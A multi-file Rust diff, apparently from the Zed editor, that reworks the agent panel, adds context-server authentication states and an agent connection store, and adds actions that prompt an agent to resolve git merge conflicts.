@@ -789,29 +891,62 @@ impl ConfigureContextServerModal {
)
}
- fn render_waiting_for_context_server() -> Div {
+ fn render_loading(&self, label: impl Into<SharedString>) -> Div {
h_flex()
- .gap_2()
+ .h_8()
+ .gap_1p5()
+ .justify_center()
.child(
- Icon::new(IconName::ArrowCircle)
+ Icon::new(IconName::LoadCircle)
.size(IconSize::XSmall)
- .color(Color::Info)
- .with_rotate_animation(2)
- .into_any_element(),
+ .color(Color::Muted)
+ .with_rotate_animation(3),
)
+ .child(Label::new(label).size(LabelSize::Small).color(Color::Muted))
+ }
+
+ fn render_auth_required(&self, server_id: &ContextServerId, cx: &mut Context<Self>) -> Div {
+ h_flex()
+ .h_8()
+ .min_w_0()
+ .w_full()
+ .gap_2()
+ .justify_center()
.child(
- Label::new("Waiting for Context Server")
- .size(LabelSize::Small)
- .color(Color::Muted),
+ h_flex()
+ .gap_1p5()
+ .child(
+ Icon::new(IconName::Info)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
+ .child(
+ Label::new("Authenticate to connect this server")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .child(
+ Button::new("authenticate-server", "Authenticate")
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click({
+ let server_id = server_id.clone();
+ cx.listener(move |this, _event, _window, cx| {
+ this.authenticate(server_id.clone(), cx);
+ })
+ }),
)
}
fn render_modal_error(error: SharedString) -> Div {
h_flex()
- .gap_2()
+ .h_8()
+ .gap_1p5()
+ .justify_center()
.child(
Icon::new(IconName::Warning)
- .size(IconSize::XSmall)
+ .size(IconSize::Small)
.color(Color::Warning),
)
.child(
@@ -826,7 +961,7 @@ impl Render for ConfigureContextServerModal {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
div()
.elevation_3(cx)
- .w(rems(34.))
+ .w(rems(40.))
.key_context("ConfigureContextServerModal")
.on_action(
cx.listener(|this, _: &menu::Cancel, _window, cx| this.cancel(&menu::Cancel, cx)),
@@ -853,11 +988,18 @@ impl Render for ConfigureContextServerModal {
.overflow_y_scroll()
.track_scroll(&self.scroll_handle)
.child(self.render_modal_description(window, cx))
+ .children(self.render_tab_bar(cx))
.child(self.render_modal_content(cx))
.child(match &self.state {
State::Idle => div(),
State::Waiting => {
- Self::render_waiting_for_context_server()
+ self.render_loading("Connecting Server…")
+ }
+ State::AuthRequired { server_id } => {
+ self.render_auth_required(&server_id.clone(), cx)
+ }
+ State::Authenticating { .. } => {
+ self.render_loading("Authenticating…")
}
State::Error(error) => {
Self::render_modal_error(error.clone())
@@ -876,7 +1018,7 @@ fn wait_for_context_server(
context_server_store: &Entity<ContextServerStore>,
context_server_id: ContextServerId,
cx: &mut App,
-) -> Task<Result<(), Arc<str>>> {
+) -> Task<Result<ContextServerStatus, Arc<str>>> {
use std::time::Duration;
const WAIT_TIMEOUT: Duration = Duration::from_secs(120);
@@ -886,31 +1028,29 @@ fn wait_for_context_server(
let context_server_id_for_timeout = context_server_id.clone();
let subscription = cx.subscribe(context_server_store, move |_, event, _cx| {
- let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event;
+ let ServerStatusChangedEvent { server_id, status } = event;
+
+ if server_id != &context_server_id {
+ return;
+ }
match status {
- ContextServerStatus::Running => {
- if server_id == &context_server_id
- && let Some(tx) = tx.lock().unwrap().take()
- {
- let _ = tx.send(Ok(()));
+ ContextServerStatus::Running | ContextServerStatus::AuthRequired => {
+ if let Some(tx) = tx.lock().take() {
+ let _ = tx.send(Ok(status.clone()));
}
}
ContextServerStatus::Stopped => {
- if server_id == &context_server_id
- && let Some(tx) = tx.lock().unwrap().take()
- {
+ if let Some(tx) = tx.lock().take() {
let _ = tx.send(Err("Context server stopped running".into()));
}
}
ContextServerStatus::Error(error) => {
- if server_id == &context_server_id
- && let Some(tx) = tx.lock().unwrap().take()
- {
+ if let Some(tx) = tx.lock().take() {
let _ = tx.send(Err(error.clone()));
}
}
- _ => {}
+ ContextServerStatus::Starting | ContextServerStatus::Authenticating => {}
}
});
@@ -0,0 +1,181 @@
+use std::rc::Rc;
+
+use acp_thread::{AgentConnection, LoadError};
+use agent_servers::{AgentServer, AgentServerDelegate};
+use anyhow::Result;
+use collections::HashMap;
+use futures::{FutureExt, future::Shared};
+use gpui::{AppContext, Context, Entity, EventEmitter, SharedString, Subscription, Task};
+use project::{AgentServerStore, AgentServersUpdated, Project};
+use watch::Receiver;
+
+use crate::{Agent, ThreadHistory};
+
+pub enum AgentConnectionEntry {
+ Connecting {
+ connect_task: Shared<Task<Result<AgentConnectedState, LoadError>>>,
+ },
+ Connected(AgentConnectedState),
+ Error {
+ error: LoadError,
+ },
+}
+
+#[derive(Clone)]
+pub struct AgentConnectedState {
+ pub connection: Rc<dyn AgentConnection>,
+ pub history: Option<Entity<ThreadHistory>>,
+}
+
+impl AgentConnectionEntry {
+ pub fn wait_for_connection(&self) -> Shared<Task<Result<AgentConnectedState, LoadError>>> {
+ match self {
+ AgentConnectionEntry::Connecting { connect_task } => connect_task.clone(),
+ AgentConnectionEntry::Connected(state) => Task::ready(Ok(state.clone())).shared(),
+ AgentConnectionEntry::Error { error } => Task::ready(Err(error.clone())).shared(),
+ }
+ }
+
+ pub fn history(&self) -> Option<&Entity<ThreadHistory>> {
+ match self {
+ AgentConnectionEntry::Connected(state) => state.history.as_ref(),
+ _ => None,
+ }
+ }
+}
+
+pub enum AgentConnectionEntryEvent {
+ NewVersionAvailable(SharedString),
+}
+
+impl EventEmitter<AgentConnectionEntryEvent> for AgentConnectionEntry {}
+
+pub struct AgentConnectionStore {
+ project: Entity<Project>,
+ entries: HashMap<Agent, Entity<AgentConnectionEntry>>,
+ _subscriptions: Vec<Subscription>,
+}
+
+impl AgentConnectionStore {
+ pub fn new(project: Entity<Project>, cx: &mut Context<Self>) -> Self {
+ let agent_server_store = project.read(cx).agent_server_store().clone();
+ let subscription = cx.subscribe(&agent_server_store, Self::handle_agent_servers_updated);
+ Self {
+ project,
+ entries: HashMap::default(),
+ _subscriptions: vec![subscription],
+ }
+ }
+
+ pub fn entry(&self, key: &Agent) -> Option<&Entity<AgentConnectionEntry>> {
+ self.entries.get(key)
+ }
+
+ pub fn request_connection(
+ &mut self,
+ key: Agent,
+ server: Rc<dyn AgentServer>,
+ cx: &mut Context<Self>,
+ ) -> Entity<AgentConnectionEntry> {
+ self.entries.get(&key).cloned().unwrap_or_else(|| {
+ let (mut new_version_rx, connect_task) = self.start_connection(server.clone(), cx);
+ let connect_task = connect_task.shared();
+
+ let entry = cx.new(|_cx| AgentConnectionEntry::Connecting {
+ connect_task: connect_task.clone(),
+ });
+
+ self.entries.insert(key.clone(), entry.clone());
+
+ cx.spawn({
+ let key = key.clone();
+ let entry = entry.clone();
+ async move |this, cx| match connect_task.await {
+ Ok(connected_state) => {
+ entry.update(cx, |entry, cx| {
+ if let AgentConnectionEntry::Connecting { .. } = entry {
+ *entry = AgentConnectionEntry::Connected(connected_state);
+ cx.notify();
+ }
+ });
+ }
+ Err(error) => {
+ entry.update(cx, |entry, cx| {
+ if let AgentConnectionEntry::Connecting { .. } = entry {
+ *entry = AgentConnectionEntry::Error { error };
+ cx.notify();
+ }
+ });
+ this.update(cx, |this, _cx| this.entries.remove(&key)).ok();
+ }
+ }
+ })
+ .detach();
+
+ cx.spawn({
+ let entry = entry.clone();
+ async move |this, cx| {
+ while let Ok(version) = new_version_rx.recv().await {
+ if let Some(version) = version {
+ entry.update(cx, |_entry, cx| {
+ cx.emit(AgentConnectionEntryEvent::NewVersionAvailable(
+ version.clone().into(),
+ ));
+ });
+ this.update(cx, |this, _cx| this.entries.remove(&key)).ok();
+ }
+ }
+ }
+ })
+ .detach();
+
+ entry
+ })
+ }
+
+ fn handle_agent_servers_updated(
+ &mut self,
+ store: Entity<AgentServerStore>,
+ _: &AgentServersUpdated,
+ cx: &mut Context<Self>,
+ ) {
+ let store = store.read(cx);
+ self.entries.retain(|key, _| match key {
+ Agent::NativeAgent => true,
+ Agent::Custom { id } => store.external_agents.contains_key(id),
+ });
+ cx.notify();
+ }
+
+ fn start_connection(
+ &self,
+ server: Rc<dyn AgentServer>,
+ cx: &mut Context<Self>,
+ ) -> (
+ Receiver<Option<String>>,
+ Task<Result<AgentConnectedState, LoadError>>,
+ ) {
+ let (new_version_tx, new_version_rx) = watch::channel::<Option<String>>(None);
+
+ let agent_server_store = self.project.read(cx).agent_server_store().clone();
+ let delegate = AgentServerDelegate::new(agent_server_store, Some(new_version_tx));
+
+ let connect_task = server.connect(delegate, self.project.clone(), cx);
+ let connect_task = cx.spawn(async move |_this, cx| match connect_task.await {
+ Ok(connection) => cx.update(|cx| {
+ let history = connection
+ .session_list(cx)
+ .map(|session_list| cx.new(|cx| ThreadHistory::new(session_list, cx)));
+ Ok(AgentConnectedState {
+ connection,
+ history,
+ })
+ }),
+ Err(err) => match err.downcast::<LoadError>() {
+ Ok(load_error) => Err(load_error),
+ Err(err) => Err(LoadError::Other(SharedString::from(err.to_string()))),
+ },
+ });
+ (new_version_rx, connect_task)
+ }
+}
@@ -44,7 +44,6 @@ pub struct AgentDiffPane {
thread: Entity<AcpThread>,
focus_handle: FocusHandle,
workspace: WeakEntity<Workspace>,
- title: SharedString,
_subscriptions: Vec<Subscription>,
}
@@ -113,7 +112,6 @@ impl AgentDiffPane {
this.handle_acp_thread_event(event, cx)
}),
],
- title: SharedString::default(),
multibuffer,
editor,
thread,
@@ -121,7 +119,6 @@ impl AgentDiffPane {
workspace,
};
this.update_excerpts(window, cx);
- this.update_title(cx);
this
}
@@ -231,17 +228,9 @@ impl AgentDiffPane {
}
}
- fn update_title(&mut self, cx: &mut Context<Self>) {
- let new_title = self.thread.read(cx).title();
- if new_title != self.title {
- self.title = new_title;
- cx.emit(EditorEvent::TitleChanged);
- }
- }
-
fn handle_acp_thread_event(&mut self, event: &AcpThreadEvent, cx: &mut Context<Self>) {
if let AcpThreadEvent::TitleUpdated = event {
- self.update_title(cx)
+ cx.emit(EditorEvent::TitleChanged);
}
}
@@ -534,13 +523,17 @@ impl Item for AgentDiffPane {
fn tab_content(&self, params: TabContentParams, _window: &Window, cx: &App) -> AnyElement {
let title = self.thread.read(cx).title();
- Label::new(format!("Review: {}", title))
- .color(if params.selected {
- Color::Default
- } else {
- Color::Muted
- })
- .into_any_element()
+ Label::new(if let Some(title) = title {
+ format!("Review: {}", title)
+ } else {
+ "Review".to_string()
+ })
+ .color(if params.selected {
+ Color::Default
+ } else {
+ Color::Muted
+ })
+ .into_any_element()
}
fn telemetry_event_text(&self) -> Option<&'static str> {
@@ -686,10 +679,11 @@ impl Render for AgentDiffPane {
.child(
Button::new("continue-iterating", "Continue Iterating")
.style(ButtonStyle::Filled)
- .icon(IconName::ForwardArrow)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::ForwardArrow)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.full_width()
.key_binding(KeyBinding::for_action_in(
&ToggleFocus,
@@ -1804,7 +1798,7 @@ mod tests {
use settings::SettingsStore;
use std::{path::Path, rc::Rc};
use util::path;
- use workspace::MultiWorkspace;
+ use workspace::{MultiWorkspace, PathList};
#[gpui::test]
async fn test_multibuffer_agent_diff(cx: &mut TestAppContext) {
@@ -1832,9 +1826,11 @@ mod tests {
let connection = Rc::new(acp_thread::StubAgentConnection::new());
let thread = cx
.update(|cx| {
- connection
- .clone()
- .new_session(project.clone(), Path::new(path!("/test")), cx)
+ connection.clone().new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
})
.await
.unwrap();
@@ -2023,9 +2019,11 @@ mod tests {
let connection = Rc::new(acp_thread::StubAgentConnection::new());
let thread = cx
.update(|_, cx| {
- connection
- .clone()
- .new_session(project.clone(), Path::new(path!("/test")), cx)
+ connection.clone().new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
})
.await
.unwrap();
@@ -9,7 +9,7 @@ use language_model::IconOrSvg;
use picker::popover_menu::PickerPopoverMenu;
use settings::update_settings_file;
use std::sync::Arc;
-use ui::{ButtonLike, PopoverMenuHandle, TintColor, Tooltip, prelude::*};
+use ui::{PopoverMenuHandle, Tooltip, prelude::*};
pub struct AgentModelSelector {
selector: Entity<LanguageModelSelector>,
@@ -112,9 +112,11 @@ impl Render for AgentModelSelector {
PickerPopoverMenu::new(
self.selector.clone(),
- ButtonLike::new("active-model")
+ Button::new("active-model", model_name)
+ .label_size(LabelSize::Small)
+ .color(color)
.when_some(provider_icon, |this, icon| {
- this.child(
+ this.start_icon(
match icon {
IconOrSvg::Svg(path) => Icon::from_external_svg(path),
IconOrSvg::Icon(name) => Icon::new(name),
@@ -123,14 +125,7 @@ impl Render for AgentModelSelector {
.size(IconSize::XSmall),
)
})
- .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .child(
- Label::new(model_name)
- .color(color)
- .size(LabelSize::Small)
- .ml_0p5(),
- )
- .child(
+ .end_icon(
Icon::new(IconName::ChevronDown)
.color(color)
.size(IconSize::XSmall),
@@ -13,42 +13,47 @@ use acp_thread::{AcpThread, MentionUri, ThreadStatus};
use agent::{ContextServerRegistry, SharedThread, ThreadStore};
use agent_client_protocol as acp;
use agent_servers::AgentServer;
-use db::kvp::{Dismissable, KEY_VALUE_STORE};
+use collections::HashSet;
+use db::kvp::{Dismissable, KeyValueStore};
use itertools::Itertools;
-use project::{
- ExternalAgentServerName,
- agent_server_store::{CLAUDE_AGENT_NAME, CODEX_NAME, GEMINI_NAME},
-};
+use project::AgentId;
use serde::{Deserialize, Serialize};
use settings::{LanguageModelProviderSetting, LanguageModelSelection};
use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _};
-use zed_actions::agent::{OpenClaudeAgentOnboardingModal, ReauthenticateAgent, ReviewBranchDiff};
+use zed_actions::agent::{
+ ConflictContent, OpenClaudeAgentOnboardingModal, ReauthenticateAgent,
+ ResolveConflictedFilesWithAgent, ResolveConflictsWithAgent, ReviewBranchDiff,
+};
-use crate::ManageProfiles;
-use crate::ui::{AcpOnboardingModal, ClaudeCodeOnboardingModal};
use crate::{
- AddContextServer, AgentDiffPane, ConnectionView, CopyThreadToClipboard, Follow,
- InlineAssistant, LoadThreadFromClipboard, NewTextThread, NewThread, OpenActiveThreadAsMarkdown,
- OpenAgentDiff, OpenHistory, ResetTrialEndUpsell, ResetTrialUpsell, StartThreadIn,
- ToggleNavigationMenu, ToggleNewThreadMenu, ToggleOptionsMenu, ToggleStartThreadInSelector,
+ AddContextServer, AgentDiffPane, ConversationView, CopyThreadToClipboard, CycleStartThreadIn,
+ Follow, InlineAssistant, LoadThreadFromClipboard, NewTextThread, NewThread,
+ OpenActiveThreadAsMarkdown, OpenAgentDiff, OpenHistory, ResetTrialEndUpsell, ResetTrialUpsell,
+ StartThreadIn, ToggleNavigationMenu, ToggleNewThreadMenu, ToggleOptionsMenu,
agent_configuration::{AgentConfiguration, AssistantConfigurationEvent},
- connection_view::{AcpThreadViewEvent, ThreadView},
+ conversation_view::{AcpThreadViewEvent, ThreadView},
slash_command::SlashCommandCompletionProvider,
text_thread_editor::{AgentPanelDelegate, TextThreadEditor, make_lsp_adapter_delegate},
ui::EndTrialUpsell,
};
use crate::{
- AgentInitialContent, ExternalAgent, ExternalSourcePrompt, NewExternalAgentThread,
+ Agent, AgentInitialContent, ExternalSourcePrompt, NewExternalAgentThread,
NewNativeAgentThreadFromSummary,
};
use crate::{
- ExpandMessageEditor, ThreadHistory, ThreadHistoryEvent,
+ DEFAULT_THREAD_TITLE,
+ ui::{AcpOnboardingModal, ClaudeCodeOnboardingModal, HoldForDefault},
+};
+use crate::{
+ ExpandMessageEditor, ThreadHistoryView,
text_thread_history::{TextThreadHistory, TextThreadHistoryEvent},
};
+use crate::{ManageProfiles, ThreadHistoryViewEvent};
+use crate::{ThreadHistory, agent_connection_store::AgentConnectionStore};
use agent_settings::AgentSettings;
use ai_onboarding::AgentPanelOnboarding;
-use anyhow::{Result, anyhow};
+use anyhow::{Context as _, Result, anyhow};
use assistant_slash_command::SlashCommandWorkingSet;
use assistant_text_thread::{TextThread, TextThreadEvent, TextThreadSummary};
use client::UserStore;
@@ -58,7 +63,6 @@ use editor::{Anchor, AnchorRangeExt as _, Editor, EditorEvent, MultiBuffer};
use extension::ExtensionEvents;
use extension_host::ExtensionStore;
use fs::Fs;
-use git::repository::validate_worktree_directory;
use gpui::{
Action, Animation, AnimationExt, AnyElement, App, AsyncWindowContext, ClipboardItem, Corner,
DismissEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, KeyContext, Pixels,
@@ -74,14 +78,13 @@ use search::{BufferSearchBar, buffer_search};
use settings::{Settings, update_settings_file};
use theme::ThemeSettings;
use ui::{
- Button, ButtonLike, Callout, ContextMenu, ContextMenuEntry, DocumentationSide, KeyBinding,
- PopoverMenu, PopoverMenuHandle, SpinnerLabel, Tab, TintColor, Tooltip, prelude::*,
- utils::WithRemSize,
+ Button, Callout, CommonAnimationExt, ContextMenu, ContextMenuEntry, DocumentationSide,
+ KeyBinding, PopoverMenu, PopoverMenuHandle, Tab, Tooltip, prelude::*, utils::WithRemSize,
};
-use util::ResultExt as _;
+use util::{ResultExt as _, debug_panic};
use workspace::{
- CollaboratorId, DraggedSelection, DraggedTab, ToggleZoom, ToolbarItemView, Workspace,
- WorkspaceId,
+ CollaboratorId, DraggedSelection, DraggedTab, OpenResult, PathList, SerializedPathList,
+ ToggleWorkspaceSidebar, ToggleZoom, ToolbarItemView, Workspace, WorkspaceId,
dock::{DockPosition, Panel, PanelEvent},
};
use zed_actions::{
@@ -92,10 +95,12 @@ use zed_actions::{
const AGENT_PANEL_KEY: &str = "agent_panel";
const RECENTLY_UPDATED_MENU_LIMIT: usize = 6;
-const DEFAULT_THREAD_TITLE: &str = "New Thread";
-fn read_serialized_panel(workspace_id: workspace::WorkspaceId) -> Option<SerializedAgentPanel> {
- let scope = KEY_VALUE_STORE.scoped(AGENT_PANEL_KEY);
+fn read_serialized_panel(
+ workspace_id: workspace::WorkspaceId,
+ kvp: &KeyValueStore,
+) -> Option<SerializedAgentPanel> {
+ let scope = kvp.scoped(AGENT_PANEL_KEY);
let key = i64::from(workspace_id).to_string();
scope
.read(&key)
@@ -107,8 +112,9 @@ fn read_serialized_panel(workspace_id: workspace::WorkspaceId) -> Option<Seriali
async fn save_serialized_panel(
workspace_id: workspace::WorkspaceId,
panel: SerializedAgentPanel,
+ kvp: KeyValueStore,
) -> Result<()> {
- let scope = KEY_VALUE_STORE.scoped(AGENT_PANEL_KEY);
+ let scope = kvp.scoped(AGENT_PANEL_KEY);
let key = i64::from(workspace_id).to_string();
scope.write(key, serde_json::to_string(&panel)?).await?;
Ok(())
@@ -116,15 +122,14 @@ async fn save_serialized_panel(
/// Migration: reads the original single-panel format stored under the
/// `"agent_panel"` KVP key before per-workspace keying was introduced.
-fn read_legacy_serialized_panel() -> Option<SerializedAgentPanel> {
- KEY_VALUE_STORE
- .read_kvp(AGENT_PANEL_KEY)
+fn read_legacy_serialized_panel(kvp: &KeyValueStore) -> Option<SerializedAgentPanel> {
+ kvp.read_kvp(AGENT_PANEL_KEY)
.log_err()
.flatten()
.and_then(|json| serde_json::from_str::<SerializedAgentPanel>(&json).log_err())
}
-#[derive(Serialize, Deserialize, Debug, Clone)]
+#[derive(Serialize, Deserialize, Debug)]
struct SerializedAgentPanel {
width: Option<Pixels>,
selected_agent: Option<AgentType>,
@@ -134,12 +139,12 @@ struct SerializedAgentPanel {
start_thread_in: Option<StartThreadIn>,
}
-#[derive(Serialize, Deserialize, Debug, Clone)]
+#[derive(Serialize, Deserialize, Debug)]
struct SerializedActiveThread {
session_id: String,
agent_type: AgentType,
title: Option<String>,
- cwd: Option<std::path::PathBuf>,
+ work_dirs: Option<SerializedPathList>,
}
pub fn init(cx: &mut App) {
@@ -219,9 +224,9 @@ pub fn init(cx: &mut App) {
.register_action(|workspace, _: &OpenAgentDiff, window, cx| {
let thread = workspace
.panel::<AgentPanel>(cx)
- .and_then(|panel| panel.read(cx).active_connection_view().cloned())
- .and_then(|thread_view| {
- thread_view
+ .and_then(|panel| panel.read(cx).active_conversation_view().cloned())
+ .and_then(|conversation| {
+ conversation
.read(cx)
.active_thread()
.map(|r| r.read(cx).thread.clone())
@@ -255,18 +260,6 @@ pub fn init(cx: &mut App) {
});
}
})
- .register_action(|workspace, _: &ToggleStartThreadInSelector, window, cx| {
- if let Some(panel) = workspace.panel::<AgentPanel>(cx) {
- workspace.focus_panel::<AgentPanel>(window, cx);
- panel.update(cx, |panel, cx| {
- panel.toggle_start_thread_in_selector(
- &ToggleStartThreadInSelector,
- window,
- cx,
- );
- });
- }
- })
.register_action(|workspace, _: &OpenAcpOnboardingModal, window, cx| {
AcpOnboardingModal::toggle(workspace, window, cx)
})
@@ -358,10 +351,72 @@ pub fn init(cx: &mut App) {
);
});
})
- .register_action(|workspace, action: &StartThreadIn, _window, cx| {
+ .register_action(
+ |workspace, action: &ResolveConflictsWithAgent, window, cx| {
+ let Some(panel) = workspace.panel::<AgentPanel>(cx) else {
+ return;
+ };
+
+ let content_blocks = build_conflict_resolution_prompt(&action.conflicts);
+
+ workspace.focus_panel::<AgentPanel>(window, cx);
+
+ panel.update(cx, |panel, cx| {
+ panel.external_thread(
+ None,
+ None,
+ None,
+ None,
+ Some(AgentInitialContent::ContentBlock {
+ blocks: content_blocks,
+ auto_submit: true,
+ }),
+ true,
+ window,
+ cx,
+ );
+ });
+ },
+ )
+ .register_action(
+ |workspace, action: &ResolveConflictedFilesWithAgent, window, cx| {
+ let Some(panel) = workspace.panel::<AgentPanel>(cx) else {
+ return;
+ };
+
+ let content_blocks =
+ build_conflicted_files_resolution_prompt(&action.conflicted_file_paths);
+
+ workspace.focus_panel::<AgentPanel>(window, cx);
+
+ panel.update(cx, |panel, cx| {
+ panel.external_thread(
+ None,
+ None,
+ None,
+ None,
+ Some(AgentInitialContent::ContentBlock {
+ blocks: content_blocks,
+ auto_submit: true,
+ }),
+ true,
+ window,
+ cx,
+ );
+ });
+ },
+ )
+ .register_action(|workspace, action: &StartThreadIn, window, cx| {
+ if let Some(panel) = workspace.panel::<AgentPanel>(cx) {
+ panel.update(cx, |panel, cx| {
+ panel.set_start_thread_in(action, window, cx);
+ });
+ }
+ })
+ .register_action(|workspace, _: &CycleStartThreadIn, window, cx| {
if let Some(panel) = workspace.panel::<AgentPanel>(cx) {
panel.update(cx, |panel, cx| {
- panel.set_start_thread_in(action, cx);
+ panel.cycle_start_thread_in(window, cx);
});
}
});
@@ -370,16 +425,123 @@ pub fn init(cx: &mut App) {
.detach();
}
-#[derive(Clone, Copy, Debug, PartialEq, Eq)]
-enum HistoryKind {
- AgentThreads,
+fn conflict_resource_block(conflict: &ConflictContent) -> acp::ContentBlock {
+ let mention_uri = MentionUri::MergeConflict {
+ file_path: conflict.file_path.clone(),
+ };
+ acp::ContentBlock::Resource(acp::EmbeddedResource::new(
+ acp::EmbeddedResourceResource::TextResourceContents(acp::TextResourceContents::new(
+ conflict.conflict_text.clone(),
+ mention_uri.to_uri().to_string(),
+ )),
+ ))
+}
+
+fn build_conflict_resolution_prompt(conflicts: &[ConflictContent]) -> Vec<acp::ContentBlock> {
+ if conflicts.is_empty() {
+ return Vec::new();
+ }
+
+ let mut blocks = Vec::new();
+
+ if conflicts.len() == 1 {
+ let conflict = &conflicts[0];
+
+ blocks.push(acp::ContentBlock::Text(acp::TextContent::new(
+ "Please resolve the following merge conflict in ",
+ )));
+ let mention = MentionUri::File {
+ abs_path: PathBuf::from(conflict.file_path.clone()),
+ };
+ blocks.push(acp::ContentBlock::ResourceLink(acp::ResourceLink::new(
+ mention.name(),
+ mention.to_uri(),
+ )));
+
+ blocks.push(acp::ContentBlock::Text(acp::TextContent::new(
+ indoc::formatdoc!(
+ "\nThe conflict is between branch `{ours}` (ours) and `{theirs}` (theirs).
+
+ Analyze both versions carefully and resolve the conflict by editing \
+ the file directly. Choose the resolution that best preserves the intent \
+ of both changes, or combine them if appropriate.
+
+ ",
+ ours = conflict.ours_branch_name,
+ theirs = conflict.theirs_branch_name,
+ ),
+ )));
+ } else {
+ let n = conflicts.len();
+ let unique_files: HashSet<&str> = conflicts.iter().map(|c| c.file_path.as_str()).collect();
+ let ours = &conflicts[0].ours_branch_name;
+ let theirs = &conflicts[0].theirs_branch_name;
+ blocks.push(acp::ContentBlock::Text(acp::TextContent::new(
+ indoc::formatdoc!(
+ "Please resolve all {n} merge conflicts below.
+
+ The conflicts are between branch `{ours}` (ours) and `{theirs}` (theirs).
+
+ For each conflict, analyze both versions carefully and resolve them \
+ by editing the file{suffix} directly. Choose resolutions that best preserve \
+ the intent of both changes, or combine them if appropriate.
+
+ ",
+ suffix = if unique_files.len() > 1 { "s" } else { "" },
+ ),
+ )));
+ }
+
+ for conflict in conflicts {
+ blocks.push(conflict_resource_block(conflict));
+ }
+
+ blocks
+}
+
+fn build_conflicted_files_resolution_prompt(
+ conflicted_file_paths: &[String],
+) -> Vec<acp::ContentBlock> {
+ if conflicted_file_paths.is_empty() {
+ return Vec::new();
+ }
+
+ let instruction = indoc::indoc!(
+ "The following files have unresolved merge conflicts. Please open each \
+ file, find the conflict markers (`<<<<<<<` / `=======` / `>>>>>>>`), \
+ and resolve every conflict by editing the files directly.
+
+ Choose resolutions that best preserve the intent of both changes, \
+ or combine them if appropriate.
+
+ Files with conflicts:
+ ",
+ );
+
+ let mut content = vec![acp::ContentBlock::Text(acp::TextContent::new(instruction))];
+ for path in conflicted_file_paths {
+ let mention = MentionUri::File {
+ abs_path: PathBuf::from(path),
+ };
+ content.push(acp::ContentBlock::ResourceLink(acp::ResourceLink::new(
+ mention.name(),
+ mention.to_uri(),
+ )));
+ content.push(acp::ContentBlock::Text(acp::TextContent::new("\n")));
+ }
+ content
+}
+
+#[derive(Clone, Debug, PartialEq, Eq)]
+enum History {
+ AgentThreads { view: Entity<ThreadHistoryView> },
TextThreads,
}
enum ActiveView {
Uninitialized,
AgentThread {
- server_view: Entity<ConnectionView>,
+ conversation_view: Entity<ConversationView>,
},
TextThread {
text_thread_editor: Entity<TextThreadEditor>,
@@ -388,7 +550,7 @@ enum ActiveView {
_subscriptions: Vec<gpui::Subscription>,
},
History {
- kind: HistoryKind,
+ history: History,
},
Configuration,
}
@@ -400,73 +562,17 @@ enum WhichFontSize {
}
// TODO unify this with ExternalAgent
-#[derive(Debug, Default, Clone, PartialEq, Serialize)]
+#[derive(Debug, Default, Clone, PartialEq, Serialize, Deserialize)]
pub enum AgentType {
#[default]
NativeAgent,
TextThread,
Custom {
- name: SharedString,
+ #[serde(rename = "name")]
+ id: AgentId,
},
}
-// Custom impl handles legacy variant names from before the built-in agents were moved to
-// the registry: "ClaudeAgent" -> Custom { name: "claude-acp" }, "Codex" -> Custom { name:
-// "codex-acp" }, "Gemini" -> Custom { name: "gemini" }.
-// Can be removed at some point in the future and go back to #[derive(Deserialize)].
-impl<'de> Deserialize<'de> for AgentType {
- fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
- where
- D: serde::Deserializer<'de>,
- {
- let value = serde_json::Value::deserialize(deserializer)?;
-
- if let Some(s) = value.as_str() {
- return match s {
- "NativeAgent" => Ok(Self::NativeAgent),
- "TextThread" => Ok(Self::TextThread),
- "ClaudeAgent" | "ClaudeCode" => Ok(Self::Custom {
- name: CLAUDE_AGENT_NAME.into(),
- }),
- "Codex" => Ok(Self::Custom {
- name: CODEX_NAME.into(),
- }),
- "Gemini" => Ok(Self::Custom {
- name: GEMINI_NAME.into(),
- }),
- other => Err(serde::de::Error::unknown_variant(
- other,
- &[
- "NativeAgent",
- "TextThread",
- "Custom",
- "ClaudeAgent",
- "ClaudeCode",
- "Codex",
- "Gemini",
- ],
- )),
- };
- }
-
- if let Some(obj) = value.as_object() {
- if let Some(inner) = obj.get("Custom") {
- #[derive(Deserialize)]
- struct CustomFields {
- name: SharedString,
- }
- let fields: CustomFields =
- serde_json::from_value(inner.clone()).map_err(serde::de::Error::custom)?;
- return Ok(Self::Custom { name: fields.name });
- }
- }
-
- Err(serde::de::Error::custom(
- "expected a string variant or {\"Custom\": {\"name\": ...}}",
- ))
- }
-}
-
impl AgentType {
pub fn is_native(&self) -> bool {
matches!(self, Self::NativeAgent)
@@ -475,7 +581,7 @@ impl AgentType {
fn label(&self) -> SharedString {
match self {
Self::NativeAgent | Self::TextThread => "Zed Agent".into(),
- Self::Custom { name, .. } => name.into(),
+ Self::Custom { id, .. } => id.0.clone(),
}
}
@@ -487,11 +593,11 @@ impl AgentType {
}
}
-impl From<ExternalAgent> for AgentType {
- fn from(value: ExternalAgent) -> Self {
+impl From<Agent> for AgentType {
+ fn from(value: Agent) -> Self {
match value {
- ExternalAgent::Custom { name } => Self::Custom { name },
- ExternalAgent::NativeAgent => Self::NativeAgent,
+ Agent::Custom { id } => Self::Custom { id },
+ Agent::NativeAgent => Self::NativeAgent,
}
}
}
@@ -499,8 +605,8 @@ impl From<ExternalAgent> for AgentType {
impl StartThreadIn {
fn label(&self) -> SharedString {
match self {
- Self::LocalProject => "Current Project".into(),
- Self::NewWorktree => "New Worktree".into(),
+ Self::LocalProject => "Current Worktree".into(),
+ Self::NewWorktree => "New Git Worktree".into(),
}
}
}
@@ -619,18 +725,18 @@ pub struct AgentPanel {
project: Entity<Project>,
fs: Arc<dyn Fs>,
language_registry: Arc<LanguageRegistry>,
- acp_history: Entity<ThreadHistory>,
text_thread_history: Entity<TextThreadHistory>,
thread_store: Entity<ThreadStore>,
